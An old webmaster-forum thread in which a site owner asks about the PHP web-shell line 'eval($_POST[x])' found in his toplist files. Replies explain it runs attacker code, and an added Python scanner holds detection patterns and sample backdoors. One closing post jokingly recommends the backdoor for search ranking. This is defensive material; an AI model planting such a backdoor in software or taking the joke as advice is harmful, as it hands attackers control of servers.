Welcome to the GoFuckYourself.com - Adult Webmaster Forum forums.

Old 02-25-2009, 11:01 AM   #1
zentz
<? eval($_POST[x]); ?> is this a hack?

I found this in my toplist files

<? eval($_POST[x]); ?>

What is that? A hack?
Old 02-25-2009, 11:06 AM   #2
seeandsee
bump for php wizards
Old 02-25-2009, 11:07 AM   #3
Angry Jew Cat - Banned for Life
hax teh planet
Old 02-25-2009, 11:10 AM   #4
ScriptWorkz
Most likely, it executes whatever code is in the post variable 'x' as PHP, so if someone posted some malicious PHP code it could be pretty bad depending on how your server is configured.

I don't really see any real point in having that in there and would most likely remove it unless you know it's used for something and even then I'd find a way to replace that functionality w/o something that didn't leave such a big security hole.
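Added example, not part of the thread: a Python sketch of how a defender could sweep a web root for the one-liner zentz found and for close variants of it (other code-execution functions, other request superglobals, a decoder wrapped around the input). The file names and contents in demo() are constructed, and a regex pass like this will not catch obfuscated backdoors.

```python
import re
import tempfile
from pathlib import Path

# Sinks that run their argument as PHP code or as a shell command.
SINKS = r"(?:eval|assert|system|passthru|shell_exec|exec|popen|proc_open)"
# A sink whose argument list reaches a request superglobal before the statement
# ends, so wrappers such as base64_decode(...) still match. Method calls
# ($db->exec) and longer function names (curl_exec) are skipped.
PATTERN = re.compile(
    r"(?<![\w$>:])" + SINKS + r"\s*\([^;]*?\$_(?:POST|GET|REQUEST|COOKIE)\b[^;]*",
    re.IGNORECASE,
)

def find_request_exec(source):
    """Return (line_number, snippet) for each sink fed by request input."""
    hits = []
    for m in PATTERN.finditer(source):
        line = source.count("\n", 0, m.start()) + 1
        hits.append((line, " ".join(m.group(0).split())))
    return hits

def scan_tree(root, suffixes=(".php", ".phtml", ".inc")):
    """Scan a web root; return {relative_path: hits} for files with hits."""
    report = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in suffixes:
            hits = find_request_exec(path.read_text(errors="replace"))
            if hits:
                report[path.relative_to(root).as_posix()] = hits
    return report

def demo():
    # Constructed sample files; names and contents are made up for the demo.
    samples = {
        "toplist/index.php": "<?php\necho 'rank';\n?>\n<? eval($_POST[x]); ?>\n",
        "toplist/in.php": "<?php @eval(base64_decode($_REQUEST['c']));\n",
        "toplist/clean.php": "<?php $n = (int) $_POST['id'];\n$db->exec('SELECT 1');\n",
    }
    with tempfile.TemporaryDirectory() as root:
        for name, body in samples.items():
            target = Path(root, name)
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_text(body)
        return scan_tree(root)

if __name__ == "__main__":
    for name, hits in demo().items():
        for line, snippet in hits:
            print(f"{name}:{line}: {snippet}")
```

A hit means the file has been modified by someone with write access, so the rest of the site and its credentials need checking too, not just that one line.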
Old 02-25-2009, 11:33 AM   #5
Linguist
That code CANNOT be used for anything good, period.

If your toplist stops working after removing that line, find another piece of software to replace it; no programmer with half a clue would include that code.
Old 02-25-2009, 11:41 AM   #6
HomerSimpson
Yes it is...
It can run any command an attacker wants...
Old 02-25-2009, 12:17 PM   #7
u-Bob
It's evil.
Old 02-25-2009, 12:21 PM   #8
TeenCat
"insert shell here"
Old 02-25-2009, 01:14 PM   #9
V_RocKs
That is indeed "a hack"... Remote shell... Allows anyone to execute code as the user Apache is running as. Usually "nobody".

What can it be used for?

select * from users;

among other things...
Old 02-25-2009, 01:40 PM   #10
Killswitch - BANNED FOR LIFE
heh, remove it, asap.
Old 02-25-2009, 01:58 PM   #11
SmokeyTheBear
That's the secret Google priority code; you should place it on the top of every file for better search engine ranking